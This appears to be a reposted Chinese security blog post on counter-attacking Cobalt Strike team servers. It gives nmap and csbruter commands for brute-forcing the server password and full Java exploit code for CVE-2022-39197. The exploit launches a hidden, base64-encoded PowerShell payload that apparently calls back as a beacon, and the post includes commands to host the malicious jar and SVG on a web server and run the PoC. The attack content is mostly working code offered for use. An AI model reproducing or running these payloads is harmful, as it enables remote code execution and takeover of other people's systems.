一、爆破cs弱⼝令
在通过检测发现存在CS后⻔,通过安全日志确认到红队 teamserver 真实ip服务器后,真实红队会把默认端口给修改掉,这里为了方便默认开放的是50050端⼝。可以通过masscan工具对服务器所有端⼝进⾏扫描,找到开放的端⼝再尝试破解⼝令。
sudo nmap -p- 192.168.245.129
通过浏览器访问CS端口可以看到响应包中存在一个特征。
nmap -p 50050 192.168.245.129 -sV -A通过nmap也可以对指定端口进行识别指纹,对于未进行修改特征的CS还是很容易就能识别出来,对于修改过特征CS识别出指纹会有些许不同。
PORT STATE SERVICE VERSION50050/tcp open ssl/unknown|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=*.microsoft.com/organizationName=Microsoft Corporation/stateOrProvinceName=WA/countryName=US
执⾏下边脚本命令即可对CS密码进行爆破。
破解脚本 https://github.com/ryanohoro/csbruter
python3 csbruter.py -p 50050 192.168.245.129 user.txt
得到密码进行连接对⽅的CS即可。
二、反制CS主控制端
CS在CobaltStrike<4.7.1 RCE(CVE-2022-39197) 这个版本存在远程RCE,红队的CS版本⽐这个低的情况下可以进⾏反制。原理是在java swing中某个控件存在RCE,CobaltStrike<4.7.1⽤到这个控件,⽬前主要的利⽤⽅法是通过hook修改进程名加载远程恶意的jar包。
脚本下载地址:https://github.com/its-arun/CVE-2022-39197
首先在蓝队的CS中生成一个PowerShell payload。
使⽤IDEA修改⼀下 jar包⾥⾯执⾏执⾏后⻔为刚才生成的PowerShell Payload。主要是通过java类根据识别运行的系统选择执行不同Payload,这里主要以Windows作为实验。
import org.w3c.dom.events.Event;import org.w3c.dom.events.EventListener;import org.w3c.dom.svg.EventListenerInitializer;import org.w3c.dom.svg.SVGDocument;import org.w3c.dom.svg.SVGSVGElement;import java.util.*;import java.io.*;public class Exploit implements EventListenerInitializer {public Exploit() {}public void initializeEventListeners(SVGDocument document) {SVGSVGElement root = document.getRootElement();EventListener listener = new EventListener() {public void handleEvent(Event event) {try {String OS = System.getProperty("os.name", "unknown").toLowerCase(Locale.ROOT);if (OS.contains("win")) {Runtime.getRuntime().exec(new String[]{"cmd","/c","powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB4AEIAVQBXAFAAMgAxAEYAWQB0AEsAaQBnAGkAUgBJAEgAZwBTADAANABxAEIAYwB5AGcASwBHADgATwBBADQAaABuADkANwArAGYAQQBUAFUAbgBlAHoAYQA1AGQANgB2AHUAdABZAHAAeQBtAE8AbgB1ADYAWAA3AG0ANgBaADUARwBoAGYAaABXAHgAYwBpAHgAcwBCAFEAQQBTAE4AMwBxAEUARQBWAE8ANABGAFAATgBVAHUAbAA2AEUAQQBpAFkAKwBrAHAAOQBLADUAZgBzADIATABkAHcAUABwADAAUABYAHQAYwBRAHYANABZAG8AcwBGADQATgBBAEIAQwBNAEkAdQBxAHYAMAB0AFgAVQBRAEkAWgBIAFYAYQA0AFQAQQA3ADEANgBBAFkAaABkAFcASwBPAEsAbAAxAHcAUQBnAGgAagBCADYAdABWAFYANgBhAHEAWQBpAHYAMwBJAHMATwBHAHIAYgAyAEEAbgBnAGEAOABlAHgASgBzAEEAUgBHAFMAagB5AGoATQBiAGgAbwBQAEEATQB4AHoALwA1AGMAdQBYAGYAbwB3AFEAOQBQAEgAcAB2AFQANgBFAG0ASQAwAGkANgBKAG0AdQBBADYATgBLAGwAZgBwAE8AegBUAGMAUQB3AGQAdABIAGMAdwBzAHQAVABQADEARgBYAGIALwBXAGgAMgA1AGcARwB1ADUAWgBMAE8AcwBiADEAbwBZAEUAeABQAG8AZwBYADUAcwBFAGwAcABGAEgAVQBGAGQARAAxADgARwBWADgAcAA5AC8AbABxAHYAUAB0ADQAMgBYAE8AcgBlAFAARABUAGUAcQBsAE4AVQBzAHcAdABDAHIAQQA5AGMAdABWADYAawBmADEAWAB4AEQATABRAHQAaABwAFMAdwA1AEYAZwBxAGkAdwBNAGIAMQB1AGUATQB6AHoAZgBwAFQANABiADEAYwBPAEMAKwBkAGYAQwA5AFgAegA1AEcAdABRADQAUABFADgAWABtAFEAdQBkAFcAVABUAHEAVgBNAGgAbABPAEMARABYAHYAQwBzAEYAeQBqAG4AdgBQADkAbgBsADkAZQBxAEcAOQB2ADMAaQBpAHgAagB4ADAAUAAxAGcAVQBmAFEAeABTAEUASwBrAFMASgBZADgARwBvAFAAagBKADgANABFAEkARgAyAGsAUwB0AEgASgBIAGoAOAA5AGYAbABLAG4ARQBDAFEAUgB3AGoAbgA3AHIANABRAHYAUwBTAFkAQQBjAHIAMQAzADcAcwB1AGoAVgBpADkALwBsADMANwBiADUAVQBaAEoAaABlAHcAUAAxAGQAcABjAHAANwBKAFMASQAxAHgAYQBoAGEATwAzAFAAaQBkACsAQwBRAEMAdAA2AGMAegBKAEYAdwBmAHYASAArAEgAYgBtAHEANQBQAGMATAB3AGEAcQBsAEgANgBVAFAAcQBBAHEAZwBDADkAYwBHAGgAcQArAFkANABQAHUATwBxADYAVwByAHEAKwBkAGkAQwBFAGsAOABsAFcAawBRAE8AWQBYAGUAVgA0AHEAdQBVAFIASgB4AHcAcwBBAEIAeQB2AEwAagAxAEYAQQBNAHEAeQAvAC8AbgBNADkAcAAyADQAdABtAFYAUAB2AFUAVQBPAE8AaQBkAGQAWQA1AEgAYwAvAEoAagA2AC8AVQBzAHgANAA0ADQASwBWADAAVgBTADIAZAAyAFoAUABQAHYANQBxAHgANAB3AEsASQA4AHYAWABQAHMAMgBFAEEAYgBjAGUASABnADgAdwAzAFAATQBlADYARQBMADcAeQAwAFoAbABCADIANABVAEYASAB2AFcATABtAEUAegA4AHIASgBUAFAAQwB4AEEATQB6AHUAaQBVAGMAMABDAGYAZgAxAFgAagBQAEEAZQAvADYAZgBaAE8AegByAEUAVwBPAGYAZQBJAGUARQBVAG8AVQBmADMAWgBtAGQATQBaAFYAcwBxAEMATAAwAEcAUAA0AEgAZAA2AEoAegBTADkAdABrAG0AYQB3AFkAdgAwAE8AYgBXAHkAeQArADcANQBlADgANwBsAHYAbQB0AEUAVQBZADIAYQB4AGkAVABQAHIAUgBxAGwAUQBzAE8ARgBvAEUAYQB4AGYAdQBTAGMAbAA5AGcAWQBCADgAVwB3AC8ASQArADcAVQB1AHgAaQB4AHoASQBpAGYARABIADMAVQB2ADAAQQAwAHYAUABXAC8AYwBBAG4ARwBSAE4AYgA1AEgAUQBKAEQASgBvAGEAUQBzAHMAeAAzAEIAeQBWAEcAagBWAHkAQQBPAHgAbABxAHIATwArAHUARgBEACsARQBKAE8AKwA0AGIAbwBrADUAWQBpAGwAaABKAHcASgBtAGMAbQB4AFUASABIAE8ARwBRAFIAcQAvACsAWgBIAHQAYQA1AEMATABIAGkAaABDAHoAMABpAFgAVgBRAGgAMwBqAFgAVwBwAE8AYQBjAE0ANgBxAGcAbQA3AEcARwBvAFAAdwBmADMATAA3AGsAeQBTAGsAcABjAHEAdwB1AEkATAAxAHoAbQBoAEIAQQBkAFEATgBjAG8AMwBRAEgAWQBWAEwAWAB5AHIAVgBmAGkAUABlAC8AdQBmAGQAegBpAGYAbgBKAHoAVAA2AEMANQA0AE8AcwBGAEkAbgA0ADMATQB0AHcAbgBpADYARgBwAEoAVgBmAEwAbAAvAGYAcwBDAHkAUQBRADUAaQBnAHgAcQBQAEEANgB4AGsAUgA3AEwAVABVAG8AbwB4AFYAeQBrAHcAMwAzAGcAdQBaAHQASgAxADEAMABKAEIATAArAE4ARgArAHgARwBuAGsAUwBjAGoARAA3AEgAbAB1AE0AaABrAHIAWQBVACsAWgBXAEYAegA4AE8AQgAzAFIAWQAxAHUAWQBkAFEAZQB0AE8ASQAyAEYAVwBPAHYAUgBEAEUAOABUAHUAZQBOACsAeQBOAGwAQwA4AGgAZwBzAEcANwBIAFgAYQBvAEIAUQBTAEcAUQB5AEYAOQAzAHYAUgA5AEYAQQBTAEEAYgBzAHEATABrAFAAKwBNADcAYQBlAFQAagBiAE8AZQBuAFAAegBMAFIAaABMAGcAVAArADMAaAB6AHkAcgBaAEUAZQA4AGIAbgA4AFMARQBoADYALwBMADcALwBFAEoARAB4AG4AWgBEADAAZwB6AEgAUgA2ADMAWgBDAHYANQBlAEMARgB1AFQARwBIAGIAaQBZAFcAQwBtAEQAdQA5AEIAWQBIAHoASgBSAHYAMQBIAHAAeABsAEQAUAA1AEkAbgBPAGgAYgBMAHEAZwA0AG4AWgBtAFAARgBqACsAZABqAGsAOABJAEUARwBJADQAVQBHAFgATABRAEMAKwBwADUAagBwAHEAWQBZAGsAagBnAEYAWgBxADEAMgAvAEgARwBtAHEAcgAzAE0AMgB1AEYAagBIAHIAcwAxAGsAaQBkAEEAMwBIAGYAYgA0AE4AagBNAGUATABsAEYAYwBEAGkAbwBtAGIAUgBaAGQAcwBEAEIAVwB2AEMAcAB0AFoAQQBuADIAVwBnAHAARAA0AG4AZABmAFQAeABmAHQAMABhAFMAeQBoAEQAYgBLAGoAaQBrADQAQwBsADYASABHAHQANAB5AFUAdwBOAHIANQBWAGwAZgBxAHMAdgBiAEkAWABEAHgAQQBxAHgAdgBoAGgAMwBrAEoASAAxAHcANABrAEQAegBaADYATgBjADkAMwB4AFoATABVAGUAUAAzAEQANAA1AEoAKwBxAEsAaABrAGcAdAB0ADIAUgBOAGgAQwBKAGIAYgA4AHYAUwBjAFEAZgBvADgAMwBEAEoAeQBJAGoAUgBnADYAeAAxAFUAVgA3AHcAWgBHADIAVwBXAGQAcgBNAFgASQBxAGEAUQAzAFgANAB4AHgAWgAwAG0AOAAwAHMAUgBmAHQAbQBKAGcATwB1AGcAQgBvAGoAYQAyAHgAVABJAEsARABiAFAAYwAyAGkAUwBzAEoAaQBTAGwAMwBUAFcAYwB4AGIAbwAwAFcAQwAyAGkAUABNAFcAaABIAHMAVwBEAHAAVABGAC8ATAB6AEgAbAB6AEQAcgBnAFYAdQA5ADYAeQB2AFMAawB6AHQATgBiAEcAdwBCAFUAMwBqAGIARwBEAGwATwAyAHcAMgBjAHQAdQBIAGcAUQByAFgARQBnAEMAcwA1AG8AcABMAHYAZQA0ADMAQwBsAEQAVABiAGQAVwBiAEwATQB0AHoAWgAvAEMAcQBVAFkATABFAHIAKwBtAE4AVABiAEYAcgBNAGEAMQB0AFoAawBMAHgATgBuAFQAdwAzAEQASQB5AHIARQAxAEQARAAzADIASQBHAGcARABSAFYAcQB5AGoAQwBKAHEAVAAwAEQAUwBlAFgAWgBnAEwAcQB3AEIAUAA2AE4AVgBJAGsATwBiAG8ANQBuAE8ASAA5AFkARAAwAE8AQgBGAGgAVgA3AEoAZQBwAHIAcQBoAFgAeQB6ADcAVgBnAGoAUwBaAHcANAB1AHkAMgBTAE4AZgBWADQANgBDAEYAegBpAHcAYQBJAE4AOABiAEsAbwBIAEYAWQBMAG4AcABTAFAATwA3AGMAeQBZAGMARABmAE4ARABUAEIAagAzAHYAYwBiAEoASAB4ADAASgBiADAAeABhAFcATQBwADAAZgBSAGUAMQB1AHAANgBTAEwARgBWAHEAaQBUAHYALwBSAFgAcwBXAFQASgA0AG4AVAAwAFcAaABPAGUAMwBMAEMAMgBxADAANQAzAEQASwBkAGoAdgBuAEEAegBvAGUAdABHAC8AQwAwAHMARwAyAGgARwAxAGoAKwA1AGcANgB1AHgAcgBxAEkAOQBPADMAagBNAGgAWABNAEIANgBZAEoAOQBGAEMAegBWAFgASABOAE4AVwB4ACsAbgBDAFQAYwBEAGIAdgB6AFkAaAB2AFAAaABvADAAQQBvADAATQBIAEwASQA1AEIANAAzAGkANAA0AHkAWQBnAGMAbQBnAG8AWQBUAGwAOAA3AEEAcgBzAE4AdABqAHMAKwBxAHoAWQBGADYAZABpAFkAMwBEAGMAYgBZAFEAbAAvAFoAaAB1AFAARABiAHQAdABoADkAQQA0AEEAUgBwAFAANQBvAGIANAA0ADYAeABmAGIAcAAzAEUARQBxAEIAMQB0AGEAVQBHADcAVwBkAEwAawBMAFcAUwBEAEoAOQAzADIAMQBPAFYAYwAvAGMAMwBVAFUASwBDAHEAYQBMAFMARwBzAHIAbQB1AGgARQBtADIAVABTAG0AagBGAHQANwBUADcAdABTAGEATABYAGwAeQBkADAAMgArAGcAQgB3AGwATgAxAEwAawArAEUASQArAEUAegBIAFcAMgBGAHAAcgBRAEYASABMADcAZgBNAEkATQBoADQAVwBIAHEARQBiADQAUQBIAGoAawAzAC8AagBqAGQAUgA0AFMAbgBtAFQAUQBRAE0AagBuAG4ANgBnAEUAYgBxAEYAZAB3AHQAVwBHADcAKwAvADcATQBhAFkAbgBtAFYAbwA5AFcAOQB5ADAAcABGAGgAbAA4AHQATABqAE4AVABCAGsAbwAzAEoAdwA4AHkAagBDAGwAegBkAHgATwB1AEoAUwArADUAdABYAEkARABoAEQAcABMAHcANwA1AG4AZgAwAEgAUgBmADUAdgBYAFUAeQA5ADEAUgB0AFMAWgBVAGcAQgB5ACsAZAB2AGIAcQByADUAdgBmACsAMgA4AG4AeAA5AGUATABuADAAYQBXAC8AdgB0ACsAYQBCAFcARwBQAGEAZQBlADAAcQBWAGgATABqAFgAYwBYADYAcgBQAG0AUgBEAEIAUgB0AEQASgBkAFUATQB0AEwAQQBYAEsANABmAFAAawBEADgAdQBRADIAWgBCAGsANgB1AFUAYQBsADgAMwBEAG4AdgBJAFAASwBoAFMANwBwAEsAMABuAGQAZQBpAGoAYgByAHUAbwBHAFYATgAwADYAZgBkAEQAQwBrAGoAVABzADEAVgB5AC8AawBjAG4AbwBpAFEANgBiADUANABhAGgASwB2AFEAbQBTAGIAdQBrAFUAawB4AG4AYgBkAHQARgBjAG4AQwBPADgAOQBGAGcAWAB3AFMAOQBmAFYAaQBTADgAMgBqAHMAUQBKADkAQgBmADQAMAAyAE4AbwBnADgATQBUAGQAUAA1AGYANAB1AHUAbABuADQAZgBsAG4ANABRAFoAcABVADMAYwA3AFcAOAB1AFgAcgBuAHkAZgB1AGQAMwBHAEsAbgA2AGgAbAA5AEYAUABzAGUALwBEADgAZQB3AEUAKwBiAC8AbgBkAG8AYwAvAEMASwAvAHUAdwBOAHUAcwBLAGgAagAvAEcAcQBsAHMAcgBmAFMAaQBYAEIAcAB0ADcATgBSADgANgBSAGYASAAzAEEAUABkAFUAdAB1AEIAYwBSAG0AdQBQAGIAYgBXAEMAUwBUADUAWABpADcAcQAxAGMARwAxAFYASwA0AEIAYgBVAHQAVQBIADkAbwBHADUASgBlAEcAegBFAE4ATQBuADMAQwBsAHIASAArAFUAVgBNAG4AVAA2AC8AdgBsAE8AcAA0AFoAdwBVAHYAMQBNAEsAdABDAEIAcABuADIALwBIAGcAVQBsAFkAQwBrAGsALwBsAFoAcwB1AGoATwBUAEMAWgBPADUAdgAvAGkAQwB1AHYATQA4AE4AQQBBAEEAPQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=="});} else if (OS.contains("mac")) {Runtime.getRuntime().exec("open -a calculator");} else if (OS.contains("nux")) {Runtime.getRuntime().exec("/usr/bin/mate-calc");}} catch (Exception e) {}}};root.addEventListener("SVGLoad", listener, false);}}
接下来通过Maven来生成jar包。
将生成的EvilJar-1.0-jar-with-dependencies.jar放⼊cve中的serve⽬录,接着修改url下载访问jar的地址。
开启8080端⼝服务
python3 -m http.server 8080
找到红队artifact.exe⽂件。
使⽤poc执⾏即可
python cve-2022-39197.py artifact.exe http://172.25.224.153:8080/evil.svg在执行这个代码之前要做好靶机与物理机之间的隔离,防止红队进行渗透。程序执行一分钟自动退出。
靶机上线,红队CS只要打开进程管理,就会执⾏蓝队的后⻔。
蓝队cs上线红队主控制端,反制成功了。
原文始发于微信公众号(我真不会渗透):CobaltStrike溯源反制
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论